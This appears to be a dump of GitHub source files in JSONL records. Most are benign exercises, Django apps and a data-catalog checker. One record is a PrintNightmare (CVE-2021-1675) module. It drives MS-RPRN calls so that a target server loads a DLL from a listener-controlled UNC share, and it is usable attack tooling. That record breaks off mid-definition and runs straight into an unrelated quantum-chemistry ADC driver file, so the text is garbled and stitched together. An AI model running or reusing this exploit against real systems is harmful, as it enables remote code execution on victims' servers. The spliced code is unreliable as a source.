\"OOOOOOOOOOOE\"\n]\nsolution(maps)","repo_name":"haseungyeon/study","sub_path":"python/algorithm/4th_week/escape_maze.py","file_name":"escape_maze.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13461029347","text":"\nCARD_WIDTH = 95\nCARD_HEIGHT = 120\n\nNUM_CARDS_WITH_PLAYER = 13\nCOMPUTER_DELAY = 3\n\n\nDISPLAY_HEIGHT = 700\nDISPLAY_WIDTH = 1500\n\nBUTTON_WIDTH = 150\nBUTTON_HEIGHT = 50\n\nBORDER_GAP = 20\nCARD_GAP = 105\n\nFONT_COLOR = (255,255,255)\nFONT_SIZE = 20\n\nINITIAL_PLAYER_POINTS = 90\nINITIAL_COMPUTER_POINTS = 90\n\n\n# Pre-process Display values\nMID_CARD_POS = (2 * BORDER_GAP + FONT_SIZE + CARD_HEIGHT) + (DISPLAY_HEIGHT - CARD_HEIGHT - BORDER_GAP - \\\n(2 * BORDER_GAP + FONT_SIZE + CARD_HEIGHT))/2 - CARD_HEIGHT/2 - FONT_SIZE/2\n\nBUTTON_VERTICAL_HEIGHT = 250\n\nMUSIC_NAME = \"music/Rival - Throne - (ft. Neoni).mp3\"\n\"\"\"\nMusic Credits:\nTrack: Rival - Throne - (ft. Neoni) [NCS Release]\nMusic provided by NoCopyrightSounds.\nWatch: https://www.youtube.com/watch?v=midpbHJ4EIk\nFree Download / Stream: http://ncs.io/Throne\n\"\"\"","repo_name":"Manas2030/InSpades","sub_path":"game_constants.py","file_name":"game_constants.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1984539871","text":"from .models import Todo, Tag\r\nfrom django.contrib.auth.models import User\r\nfrom rest_framework import serializers\r\n\r\nclass TodoSerializer(serializers.HyperlinkedModelSerializer):\r\n owner = serializers.ReadOnlyField(source='owner.username')\r\n \r\n class Meta:\r\n model = Todo\r\n fields = ['url', 'id', 'todo_title', 'tags', 'text', 'owner']\r\n extra_kwargs = {\r\n 'url': {'view_name': 'todo:todo-detail'},\r\n 'tags': {'view_name': 'todo:tag-detail'},\r\n }\r\n\r\nclass TagSerializer(serializers.HyperlinkedModelSerializer):\r\n class Meta:\r\n model = Tag\r\n fields = ['url', 'id', 'tag_title', 'todo_set']\r\n extra_kwargs = {\r\n 'url': {'view_name': 'todo:tag-detail'},\r\n 'todo_set': {'view_name': 'todo:todo-detail'},\r\n }\r\n\r\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\r\n todo_set = serializers.HyperlinkedRelatedField(many=True, view_name='todo:todo-detail', read_only=True)\r\n\r\n class Meta:\r\n model = User\r\n fields = ['url', 'id', 'username', 'todo_set']\r\n extra_kwargs = {\r\n 'url': {'view_name': 'todo:user-detail'},\r\n }","repo_name":"naufalmahing/todo-app","sub_path":"todo_site/todo/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19452232240","text":"from django.contrib import admin\nfrom django.utils.html import mark_safe, format_html\nfrom projects.models import Project, ProjectFiles, ProjectUser, PythonTrain\n\n\nclass ProjectFilesInline(admin.TabularInline):\n model = ProjectFiles\n extra = 1\n exclude = ('is_deleted',)\n\n\nclass ProjectAdmin(admin.ModelAdmin):\n list_display = ('name', 'start_date', 'end_date', 'stuff_list')\n sortable_by = ()\n exclude = ('is_deleted',)\n show_full_result_count = False\n\n def stuff_list(self, obj):\n pusers = ProjectUser.objects.filter(project_id=obj.id, is_deleted=0)\n users = [i.user.name for i in pusers if i.user.name]\n datas = \"
\".join(users)\n return format_html(datas)\n\n stuff_list.short_description = \"成员\"\n\n def get_queryset(self, request):\n qs = super(ProjectAdmin, self).get_queryset(request)\n qs = qs.filter(is_deleted=0)\n # if not request.user.is_superuser:\n # qs = qs.filter(projectuser__user_id=request.user.id)\n return qs\n\n def has_delete_permission(self, request, obj=None):\n if request.user.is_superuser:\n return True\n return False\n\n def has_add_permission(self, request):\n if request.user.is_superuser:\n return True\n return False\n\n def has_change_permission(self, request, obj=None):\n if request.user.is_superuser:\n return True\n return False\n\n\nclass ProjectFilesAdmin(admin.ModelAdmin):\n list_display = ('project', 'file_url', 'sort', 'created')\n exclude = ('is_deleted',)\n show_full_result_count = False\n sortable_by = ()\n\n def file_url(self, obj):\n if not obj.file:\n return ''\n return format_html(obj.file.url)\n\n def has_module_permission(self, request):\n if request.user.is_superuser:\n return True\n return False\n\n\nclass PythonTrainAdmin(admin.ModelAdmin):\n list_display = ('id', 'user_name', 'code_txt', 'created')\n list_display_links = ('code_txt',)\n list_filter = ('user',)\n exclude = ('is_deleted',)\n show_full_result_count = False\n # actions_selection_counter = False\n sortable_by = ()\n\n def code_txt(self, obj):\n return mark_safe(obj.code[:20])\n\n code_txt.short_description = \"代码\"\n\n def user_name(self, obj):\n return format_html(obj.user.name)\n\n user_name.short_description = \"学生\"\n\n def get_queryset(self, request):\n qs = super(PythonTrainAdmin, self).get_queryset(request)\n qs = qs.filter(is_deleted=0)\n if not request.user.is_superuser:\n qs = qs.filter(user_id=request.user.id)\n return qs\n\n def changelist_view(self, request, extra_context=None):\n if not request.user.is_superuser:\n self.list_display = ('id', 'code_txt', 'created')\n self.list_filter = ()\n return super(PythonTrainAdmin, self).changelist_view(request, extra_context=extra_context)\n\n def change_view(self, request, object_id, form_url=\"\", extra_context=None):\n user = request.user\n # self.change_form_template = \"python_train/change_form.html\"\n self.change_form_template = \"python_train/index.html\"\n extra_context = extra_context or {}\n train = PythonTrain.objects.filter(id=object_id).first()\n extra_context['user'] = user\n extra_context['sid'] = object_id\n extra_context['code'] = train.code or \"\"\n\n extra_context['show_save_and_continue'] = False\n extra_context['show_save'] = False\n extra_context['show_save_and_add_another'] = False\n return super(PythonTrainAdmin, self).change_view(request, object_id, form_url=form_url,\n extra_context=extra_context)\n\n def add_view(self, request, form_url=\"\", extra_context=None):\n user = request.user\n # self.change_form_template = \"python_train/change_form.html\"\n self.change_form_template = \"python_train/index.html\"\n extra_context = extra_context or {}\n extra_context['user'] = user\n extra_context['sid'] = \"\"\n extra_context['code'] = \"\"\n\n extra_context['show_save_and_continue'] = False\n extra_context['show_save'] = False\n extra_context['show_save_and_add_another'] = False\n return super(PythonTrainAdmin, self).add_view(request, form_url=form_url,\n extra_context=extra_context)\n\n\nadmin.site.register(Project, ProjectAdmin)\nadmin.site.register(ProjectFiles, ProjectFilesAdmin)\nadmin.site.register(PythonTrain, PythonTrainAdmin)\n","repo_name":"U-Recommend/lesson_sys","sub_path":"projects/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14757173571","text":"import random\n\n\ndef throws(stick, throw):\n sticks_list = ['I' for _ in range(stick)]\n for i in range(1, throw + 1):\n left_i = random.randint(1, stick)\n right_i = random.randint(left_i, stick)\n print(f'Бросок {i}. Сбиты палки с номера {left_i} по номер {right_i}')\n sticks_list = [sticks_list[i_index] if left_i - 1 > i_index or i_index > right_i - 1\n else '.' for i_index in range(stick)]\n return sticks_list\n\n\nsticks_total = int(input('Количество палок: '))\nthrows_total = int(input('Количество бросков: '))\n\nsticks = throws(sticks_total, throws_total)\n\nprint('Результат:', sticks)\n","repo_name":"Elfateru/python_basic","sub_path":"Module17/08_entertainment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33478016060","text":"# Given a linked list, remove the nth node from the end of list and return its head.\n\n# For example,\n# Given linked list: 1->2->3->4->5, and n = 2.\n# After removing the second node from the end, the linked list becomes 1->2->3->5.\n\n# Note:\n# If n is greater than the size of the list, remove the first node of the list.\n# Try doing it using constant additional space.\ndef removeNthFromEnd(A,B):\n #Calculating length\n temp = A\n lenA = 0\n while temp:\n lenA+=1\n temp = temp.next\n if lenA==0:\n return A\n if B==0:\n diff = lenA-1\n temp = A\n while diff>0:\n temp = temp.next\n diff-=1\n temp.next = None\n return A\n if B>=lenA:\n A = A.next\n return A\n else:\n diff = lenA-B-1\n temp=A\n while diff>0:\n temp = temp.next\n diff-=1\n to_delete = temp.next\n temp.next = to_delete.next\n return A\n","repo_name":"Divine11/InterviewBit","sub_path":"Linked List/Remove_nth_node_from_list_end.py","file_name":"Remove_nth_node_from_list_end.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23014911362","text":"# -*- coding: utf-8 -*-\n\"\"\"\n[Martinez-Gil2023d] Framework to Automatically Determine the Quality of Open Data Catalogs, arXiv preprint arXiv:2307.15464, 2023\n\n@author: Jorge Martinez-Gil\n\"\"\"\nimport sys\nfrom collections import defaultdict\nfrom rdflib import Graph, RDF, Namespace, URIRef\nimport requests\n\n# Define some RDF prefixes\ndcat = Namespace(\"http://www.w3.org/ns/dcat#\")\ndct = Namespace(\"http://purl.org/dc/terms/\")\nrdf = Namespace(\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\")\n\n# Example DCT properties (you can adjust as needed)\ndct_properties = [\n dct.title,\n dct.identifier,\n dct.description\n]\n\ndef check_links(rdf_data):\n \"\"\"\n Checks the links in an RDF graph to see if they are broken.\n\n Args:\n rdf_data (str): The RDF data to check for broken links.\n\n Returns:\n float: The percentage of broken links in the RDF data.\n \"\"\"\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n total_links = 0\n broken_links = 0\n for s, p, o in graph:\n if isinstance(o, URIRef):\n total_links += 1\n try:\n response = requests.get(o)\n if response.status_code != 200:\n broken_links += 1\n except:\n broken_links += 1\n if total_links == 0:\n print(\"No links found in the RDF data.\")\n return 0\n else:\n percentage_broken = (broken_links / total_links) * 100\n print(f\"{percentage_broken}% of links are broken.\")\n return percentage_broken\n\n\ndef calculate_duplicates(rdf_data):\n \"\"\"\n Calculates the percentage of duplicated datasets or distributions in a Data Catalog.\n\n Args:\n rdf_data (str): The RDF data to check for duplicates.\n\n Returns:\n float: The percentage of duplicated datasets or distributions in the RDF data.\n \"\"\"\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n\n duplicates = defaultdict(int)\n for s, p, o in graph.triples((None, None, None)):\n if p == dcat.title or p == dcat.downloadURL:\n duplicates[o] += 1\n total_items = len(duplicates)\n duplicates_count = sum(1 for count in duplicates.values() if count > 1)\n if total_items == 0:\n print(\"No datasets or distributions found in the RDF data.\")\n return 0\n else:\n percentage_duplicates = (duplicates_count / total_items) * 100\n print(f\"{percentage_duplicates}% of datasets or distributions are duplicated.\")\n return percentage_duplicates\n\n\ndef core_links(rdf_data, property_set):\n \"\"\"\n Calculates the percentage of missing core properties in a Data Catalog.\n\n Args:\n rdf_data (str): The RDF data to check for missing core properties.\n property_set (str): The property set to use ('dcat' or 'dct').\n\n Returns:\n float: The percentage of missing core properties in the RDF data.\n \"\"\"\n required_properties = dct_properties if property_set == 'dct' else [\n dcat.title,\n rdf.type\n ]\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n completeness_scores = []\n for subject_type in [dcat.Catalog, dcat.Dataset, dcat.Distribution]:\n for subject in graph.subjects(RDF.type, subject_type):\n completeness_score = calculate_completeness(graph, subject, required_properties)\n completeness_scores.append(completeness_score)\n result = sum(completeness_scores) / len(completeness_scores)\n print(f\"{result}% of core properties are not present using {property_set.upper()} properties.\")\n return result\n\n\ndef check_accuracy(rdf_data, property_set):\n \"\"\"\n Calculates the accuracy of a Data Catalog file by averaging the percentages of broken links, duplicated datasets or distributions, and missing core properties.\n\n Args:\n rdf_data (str): The RDF data to check for accuracy.\n property_set (str): The property set to use ('dcat' or 'dct').\n\n Returns:\n float: The accuracy of the RDF data file.\n \"\"\"\n core_result = core_links(rdf_data, property_set)\n duplicates_result = calculate_duplicates(rdf_data)\n check_links_result = check_links(rdf_data)\n mean = (core_result + duplicates_result + check_links_result) / 3\n return mean\n \n \ndef calculate_completeness(graph, subject, required_properties):\n \"\"\"\n Calculates the completeness of a subject in an RDF graph by checking if it has all the required properties.\n\n Args:\n graph (rdflib.Graph): The RDF graph to check for completeness.\n subject (rdflib.term.URIRef): The subject to check for completeness.\n required_properties (list): The list of required properties.\n\n Returns:\n float: The completeness percentage.\n \"\"\"\n present_properties = set()\n for predicate, obj in graph.predicate_objects(subject):\n if predicate in required_properties:\n present_properties.add(predicate)\n return len(present_properties) / len(required_properties) * 100\n \n\"\"\"\nThis program checks the accuracy of a Data Catalog by calculating the percentage of broken links, duplicated datasets or distributions, and missing core properties.\n\nUsage: python check_accuracy.py filepath\n\"\"\"\ndef main():\n try:\n if len(sys.argv) < 3:\n print(\"Usage: python check_accuracy.py filepath [dcat|dct]\")\n sys.exit(1)\n\n rdf_data_path = sys.argv[1]\n property_set = sys.argv[2]\n\n if property_set not in ['dcat', 'dct']:\n print(\"Invalid property set. Choose 'dcat' or 'dct'.\")\n sys.exit(1)\n\n with open(rdf_data_path, \"r\", encoding=\"utf-8\") as f:\n rdf_data = f.read()\n\n result = check_accuracy(rdf_data, property_set)\n print(f\"The accuracy of {rdf_data_path} using {property_set.upper()} properties is {result}%.\")\n\n except FileNotFoundError:\n print(f\"File not found: {rdf_data_path}\")\n sys.exit(1)\n except UnicodeDecodeError as e:\n print(f\"Unicode decode error: {e}\")\n sys_exit(1)\n except Exception as e:\n print(f\"Error: {e}\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()","repo_name":"jorge-martinez-gil/dataq","sub_path":"check_accuracy.py","file_name":"check_accuracy.py","file_ext":"py","file_size_in_byte":6142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38015427281","text":"\r\nstring1 = input(\"a : \")\r\n\r\nstring2 = input(\"b : \")\r\n#-----------------------------------------------------------------------------------------\r\ns1 = list(string1)\r\ns2 = list(string2) \r\n\r\ns1 = sorted(s1)\r\ns2 = sorted(s2)\r\n\r\n# print(s1)\r\n# print(s2)\r\n\r\ndlist = list()\r\ndlist2 = list()\r\nsayac=0\r\nsayac1=0\r\nsayac2=0\r\nsayac3=0\r\n\r\nif len(s1) == len(s2):\r\n for i in s1:\r\n if i in s2:\r\n sayac=sayac+1\r\n else:\r\n dlist.append(i)\r\n sayac=sayac+1\r\n print(\"Please remove from '\"+string1+\"' >> \"+str(dlist))\r\n for j in s2:\r\n if j in s1:\r\n sayac1=sayac1+1\r\n else:\r\n dlist2.append(j)\r\n sayac1=sayac1+1\r\n print(\"Please remove from '\"+string2+\"' >> \"+str(dlist2))\r\n#-------------------------------------------------------------------------\r\nif len(s1) > len(s2):\r\n for i in s1:\r\n if i in s2:\r\n sayac=sayac+1\r\n else:\r\n dlist.append(i)\r\n sayac=sayac+1\r\n print(\"Please remove from '\"+string1+\"' >> \"+str(dlist))\r\n#-------------------------------------------------------------------------\r\nif len(s2) > len(s1):\r\n for i in s2:\r\n if i in s1:\r\n sayac=sayac+1\r\n else:\r\n dlist.append(i)\r\n sayac=sayac+1\r\n print(\"Please remove from '\"+string2+\"' >> \"+str(dlist))\r\n#-------------------------------------------------------------------------\r\nstr1 = str(string1)\r\n\r\nstr2 = str(string2)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef anagram_mi(str1, str2):\r\n\r\n n1 = len(str1)\r\n\r\n n2 = len(str2)\r\n\r\n if n1 != n2:\r\n\r\n return 0\r\n\r\n str1 = sorted(str1)\r\n\r\n str2 = sorted(str2)\r\n\r\n for i in range(0, n1):\r\n\r\n if str1[i] != str2[i]:\r\n\r\n return 0\r\n\r\n return 1\r\n\r\n\r\nif anagram_mi(str1, str2):\r\n\r\n print(\"Yes it is an Anagram.\")\r\n\r\nelse:\r\n print(\"No, it is not an Anagram\")\r\n ","repo_name":"emrbli/anagram-parser","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"28431812698","text":"import sys\nfrom ctypes import *\nimport socket\nimport struct\nimport logging\n\nfrom utils.output import Output\nfrom utils.db import DB\nfrom utils.utils import gen_random_string, gen_bruteforce_creds\nfrom server.vulnerability_callback import VulnCallback\n\nimport impacket\nimport pathlib\nfrom impacket.dcerpc.v5 import rprn\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.structure import Structure\n\n# source: https://github.com/cube0x0/CVE-2021-1675\n\nclass Module:\n name = 'PrintNightmare'\n description = 'Check PrintNightmare vulnerability (CVE-2021-1675) [authenticated] (argument: IP for check or \\'\\\\\\\\IP\\\\SHARE\\\\path\\\\to\\\\dll.dll\\' for exploit)'\n\n def run(self, target, args, creds, timeout):\n if len(args) != 1:\n Output.error({'target': 'smb://%s:%d' % (target['hostname'], target['port']), 'message': '[%s] PrintNightmare module requires 1 arg: -m printnightmare ' % self.name})\n return\n else:\n listener_ip = args[0]\n\n domain = creds['domain'] if 'domain' in creds else None\n user = creds['username'] if 'username' in creds else None\n password = creds['password'] if 'password' in creds else None\n ntlm_hash = creds['hash'] if 'hash' in creds else ''\n do_kerberos = creds['kerberos'] if 'kerberos' in creds else False\n dc_ip = creds['dc_ip'] if 'dc_ip' in creds else None\n\n if user == None:\n Output.highlight({'target': 'smb://%s:%d' % (target['hostname'], target['port']), 'message': '[%s] Printnightmare module works best with an account !' % self.name})\n\n Output.minor({'target': 'smb://%s:%d' % (target['hostname'], 445), 'message': '[%s] Running module...' % self.name})\n\n check(target['hostname'], target['port'], listener_ip, domain, user, password, ntlm_hash, do_kerberos, dc_ip, timeout)\n\ndef check(ip, port, listener_ip, domain, username, password, ntlm_hash, do_kerberos, dc_ip, timeout):\n\n do_kerberos = False\n pipe = 'lsarpc'\n if len(ntlm_hash) != 0:\n if not ':' in ntlm_hash:\n lmhash = 'aad3b435b51404eeaad3b435b51404ee'\n nthash = ntlm_hash.lower()\n else:\n lmhash, nthash = ntlm_hash.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n #connect\n dce = connect(username, password, domain, lmhash, nthash, do_kerberos, dc_ip, ip, port)\n #handle = \"\\\\\\\\{0}\\x00\".format(address)\n handle = NULL\n \n #find \"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\ntprint.inf_amd64_83aa9aebf5dffc96\\\\Amd64\\\\UNIDRV.DLL\" path\n try:\n blob = getDriver(dce, handle)\n if blob == None:\n return\n\n pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\\\UNIDRV.DLL'\n if not \"FileRepository\" in pDriverPath:\n #print(\"[-] pDriverPath {0}, expected :\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\.....\".format(pDriverPath))\n #print(\"[-] Specify pDriverPath manually\")\n return\n except Exception as e:\n #print('[-] Failed to enumerate remote pDriverPath')\n #print(str(e))\n return\n\n vuln_info = {\n 'hostname': ip,\n 'port': port,\n 'service': 'smb',\n 'url': 'smb://%s:%d' % (ip, port),\n 'name': 'CVE-2021-1675 (PrintNightmare)',\n 'description': 'Server smb://%s:%d is vulnerable to CVE-2021-1675 (PrintNightmare)' % (ip, port),\n }\n\n if \"\\\\\\\\\" in listener_ip:\n listener_share = listener_ip\n else:\n # Don't do this if listener_ip = share\n vuln_id = VulnCallback.new_vulnerability_check(vuln_info)\n\n listener_share = \"\\\\\\\\%s\\\\vuln\\\\%s\" % (listener_ip, vuln_id)\n\n if \"\\\\\\\\\" in listener_share:\n listener_share = listener_share.replace(\"\\\\\\\\\",\"\\\\??\\\\UNC\\\\\")\n\n #print(\"[+] pDriverPath Found {0}\".format(pDriverPath))\n #print(\"[*] Executing {0}\".format(options.share))\n\n #re-run if stage0/stageX fails\n for i in range(3):\n #print(\"[*] Try 1...\")\n completed = exploit(ip, dce, pDriverPath, listener_share)\n if completed:\n break\n\n#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\nclass DRIVER_INFO_2_BLOB(Structure):\n structure = (\n ('cVersion',' self.adc_tol:\n error_text = os.linesep + os.linesep\n error_text += '*** SCF convergence threshold '\n error_text += '({:.1e}) '.format(scf_drv.conv_thresh)\n error_text += 'needs to be lower than ADC convergence '\n error_text += 'tolerance ({:.1e})'.format(self.adc_tol)\n error_text += os.linesep\n raise ValueError(error_text)\n\n if 'states' in adc_dict:\n self.adc_states = int(adc_dict['states'])\n\n if 'singlets' in adc_dict:\n self.adc_singlets = int(adc_dict['singlets'])\n self.adc_states = None\n\n if 'triplets' in adc_dict:\n self.adc_triplets = int(adc_dict['triplets'])\n self.adc_states = None\n self.adc_singlets = None\n\n if 'spin_flip' in adc_dict:\n self.adc_spin_flip = int(adc_dict['spin_flip'])\n self.adc_states = None\n self.adc_singlets = None\n self.adc_triplets = None\n\n if 'method' in adc_dict:\n if 'cpp' in adc_dict['method']:\n self.cpp = True\n self.adc_method = adc_dict['method'].split()[0]\n else:\n self.adc_method = adc_dict['method']\n\n if 'frequencies' in adc_dict:\n self.frequencies = adc_dict['frequencies']\n self.adc_triplets = None\n self.adc_states = None\n self.adc_singlets = None\n self.adc_spin_flip = None\n\n if 'damping' in adc_dict:\n self.damping = float(adc_dict['damping'])\n\n if 'core_orbitals' in adc_dict:\n self.adc_core_orbitals = self.parse_orbital_input(\n adc_dict['core_orbitals'])\n\n if 'frozen_core' in adc_dict:\n self.adc_frozen_core = self.parse_orbital_input(\n adc_dict['frozen_core'])\n\n if 'frozen_virtual' in adc_dict:\n self.adc_frozen_virtual = self.parse_orbital_input(\n adc_dict['frozen_virtual'])\n\n if 'print_states' in adc_dict:\n key = adc_dict['print_states'].lower()\n self.print_states = True if key in ['yes', 'y'] else False\n\n if 'ecd' in adc_dict:\n key = adc_dict['ecd'].lower()\n self.adc_ecd = False if key in ['no', 'n'] else True\n\n @staticmethod\n def parse_orbital_input(orbs):\n \"\"\"\n Parses input orbital indices (1-based) and returns a list of orbital\n indices (0-based).\n\n Examples (input -> output):\n 1 -> [0]\n (1, 3) -> [0, 2]\n '1 - 5' -> [0, 1, 2, 3, 4]\n [1, 2, 3, 4] -> [0, 1, 2, 3]\n '1-3, 4, 5-7' -> [0, 1, 2, 3, 4, 5, 6]\n\n :param orbs:\n The input orbital indices (can be integer, list, tuple, or string).\n :return:\n A list of orbital indices.\n \"\"\"\n\n if isinstance(orbs, int):\n return [orbs - 1]\n elif isinstance(orbs, (list, tuple)):\n return [x - 1 for x in orbs]\n elif isinstance(orbs, str):\n output = []\n for x in orbs.replace(',', ' ').split():\n if '-' in x:\n z = [int(y) for y in x.split('-')]\n output += list(range(z[0] - 1, z[-1], 1))\n else:\n output.append(int(x) - 1)\n return output\n\n @staticmethod\n def parse_frequencies(input_frequencies):\n \"\"\"\n Parses input frequencies for the respondo response library.\n\n Input example: \"0.4-0.5 (0.002), 0.7-0.9 (0.001)\"\n\n :param input_frequencies:\n The string of input frequencies.\n :return:\n an ndarray of frequencies required by respondo\n \"\"\"\n if isinstance(input_frequencies, np.ndarray):\n return input_frequencies\n\n frequencies = []\n for w in input_frequencies.split(','):\n if '-' in w:\n m = re.search(r'^(.*)-(.*)\\((.*)\\)$', w)\n if m is None:\n m = re.search(r'^(.*)-(.*)-(.*)$', w)\n\n frequencies += list(\n np.arange(\n float(m.group(1)),\n float(m.group(2)),\n float(m.group(3)),\n ))\n elif w:\n frequencies.append(float(w))\n return np.array(frequencies)\n\n def compute(self, task, scf_drv, verbose=True):\n \"\"\"\n Performs ADC calculation.\n\n :param task:\n The gator task.\n :param scf_drv:\n The converged SCF driver.\n \"\"\"\n\n scf_drv.task = task\n\n if self.rank == mpi_master():\n if verbose:\n self.print_header()\n\n try:\n import adcc\n except ImportError:\n error_text = os.linesep + os.linesep\n error_text += '*** Unable to import adcc. ' + os.linesep\n error_text += '*** Please download and install '\n error_text += 'from https://github.com/adc-connect/adcc'\n error_text += os.linesep\n raise ImportError(error_text)\n\n if self.cpp:\n if self.frequencies is None:\n error_text = os.linesep + os.linesep\n error_text += '*** Please define a frequency range (a.u.)'\n error_text += ' for the cpp solver.'\n error_text += os.linesep + '*** Example:' + os.linesep\n error_text += 'frequencies: 0.40-0.60 (0.05)'\n error_text += os.linesep\n raise ValueError(error_text)\n if self.damping is None:\n error_text = os.linesep + os.linesep\n error_text += '*** Please define a damping parameter '\n error_text += '(a.u.) for the cpp solver.'\n error_text += os.linesep + 'Example:' + os.linesep\n error_text += 'damping: 0.001'\n error_text += os.linesep\n raise ValueError(error_text)\n try:\n import respondo\n except ImportError:\n error_text = os.linesep + os.linesep\n error_text += '*** Unable to import respondo. ' + os.linesep\n error_text += '*** Please install from conda or '\n error_text += 'https://github.com/gator-program/respondo'\n error_text += os.linesep\n raise ImportError(error_text)\n\n adc_drv = adcc.ReferenceState(\n scf_drv,\n core_orbitals=self.adc_core_orbitals,\n frozen_core=self.adc_frozen_core,\n frozen_virtual=self.adc_frozen_virtual)\n\n frequencies = self.parse_frequencies(self.frequencies)\n all_pol = [\n respondo.complex_polarizability(adc_drv,\n method=self.adc_method,\n omega=w,\n gamma=self.damping,\n conv_tol=self.adc_tol)\n for w in frequencies\n ]\n cross_sections = (\n respondo.polarizability.one_photon_absorption_cross_section(\n np.array(all_pol), frequencies))\n\n if verbose:\n self.print_cpp_results(frequencies, cross_sections)\n\n return frequencies, cross_sections\n\n else:\n\n # set number of threads in adcc\n adcc.set_n_threads(int(os.environ['OMP_NUM_THREADS']))\n\n adc_drv = adcc.run_adc(scf_drv,\n method=self.adc_method,\n core_orbitals=self.adc_core_orbitals,\n n_states=self.adc_states,\n n_singlets=self.adc_singlets,\n n_triplets=self.adc_triplets,\n n_spin_flip=self.adc_spin_flip,\n frozen_core=self.adc_frozen_core,\n frozen_virtual=self.adc_frozen_virtual,\n conv_tol=self.adc_tol)\n\n if verbose:\n self.print_excited_states(adc_drv)\n\n if self.print_states:\n self.print_detailed_states(adc_drv)\n\n if verbose:\n self.print_convergence(adc_drv)\n\n return adc_drv\n\n def print_header(self):\n \"\"\"\n Prints header for the ADC driver.\n \"\"\"\n\n self.ostream.print_blank()\n text = 'Algebraic Diagrammatic Construction (ADC)'\n self.ostream.print_header(text)\n self.ostream.print_header('=' * (len(text) + 2))\n self.ostream.print_blank()\n\n str_width = 60\n cur_str = 'ADC method : {:s}'.format(self.adc_method)\n if self.cpp:\n cur_str += ' (cpp)'\n self.ostream.print_header(cur_str.ljust(str_width))\n if self.adc_states is not None:\n cur_str = 'Number of States : {:d}'.format(\n self.adc_states)\n self.ostream.print_header(cur_str.ljust(str_width))\n elif self.adc_singlets is not None:\n cur_str = 'Number of Singlet States : {:d}'.format(\n self.adc_singlets)\n self.ostream.print_header(cur_str.ljust(str_width))\n elif self.adc_triplets is not None:\n cur_str = 'Number of Triplet States : {:d}'.format(\n self.adc_triplets)\n self.ostream.print_header(cur_str.ljust(str_width))\n elif self.adc_spin_flip is not None:\n cur_str = 'Number of States, Spin-Flip : {:d}'.format(\n self.adc_spin_flip)\n self.ostream.print_header(cur_str.ljust(str_width))\n else:\n freqs = [f.strip() for f in self.frequencies.split(',')]\n cur_str = 'Frequencies (a.u.) : {:s}'.format(freqs[0])\n self.ostream.print_header(cur_str.ljust(str_width))\n for f in freqs[1:]:\n cur_str = ' {:s}'.format(f)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.damping is not None:\n cur_str = 'Damping : {:f} a.u.'.format(\n self.damping)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.adc_core_orbitals is not None:\n cur_str = 'CVS-ADC, Core Orbital Space :'\n for orb in self.adc_core_orbitals:\n cur_str += ' {:d}'.format(orb + 1)\n # '+1' converts from run_adc indexing (starts at 0) back to\n # input indexing (starts at 1)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.adc_frozen_core is not None:\n cur_str = 'Frozen Core Orbital Space :'\n for orb in self.adc_frozen_core:\n cur_str += ' {:d}'.format(orb + 1)\n # '+1' converts from run_adc indexing (starts at 0) back to\n # input indexing (starts at 1)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.adc_frozen_virtual is not None:\n cur_str = 'Frozen Virtual Orbital Space :'\n for orb in self.adc_frozen_virtual:\n cur_str += ' {:d}'.format(orb + 1)\n # '+1' converts from run_adc indexing (starts at 0) back to\n # input indexing (starts at 1)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n cur_str = 'Convergence threshold : {:.1e}'.format(self.adc_tol)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n self.ostream.print_blank()\n self.ostream.flush()\n\n def print_convergence(self, adc_drv):\n \"\"\"\n Prints finish header to output stream.\n \"\"\"\n\n end = ' All went well!'\n if not hasattr(adc_drv, 'converged'):\n self.ostream.print_header('NOT CONVERGED')\n end = ' Did NOT converge.'\n\n self.ostream.print_header('End of ADC calculation.' + end)\n self.ostream.print_blank()\n self.ostream.flush()\n\n def print_cpp_results(self, frequencies, cross_sections):\n from scipy import constants\n eV = constants.value(\"Hartree energy in eV\")\n\n text = 'ADC, Complex Polarization Propagator'\n self.ostream.print_blank()\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n valstr = '{} | {} | {} '.format(' Frequency (a.u) ',\n ' Frequency (eV)',\n ' Cross Section (a.u.) ')\n self.ostream.print_header(valstr)\n self.ostream.print_header('-' * (len(text) + 25))\n for i in 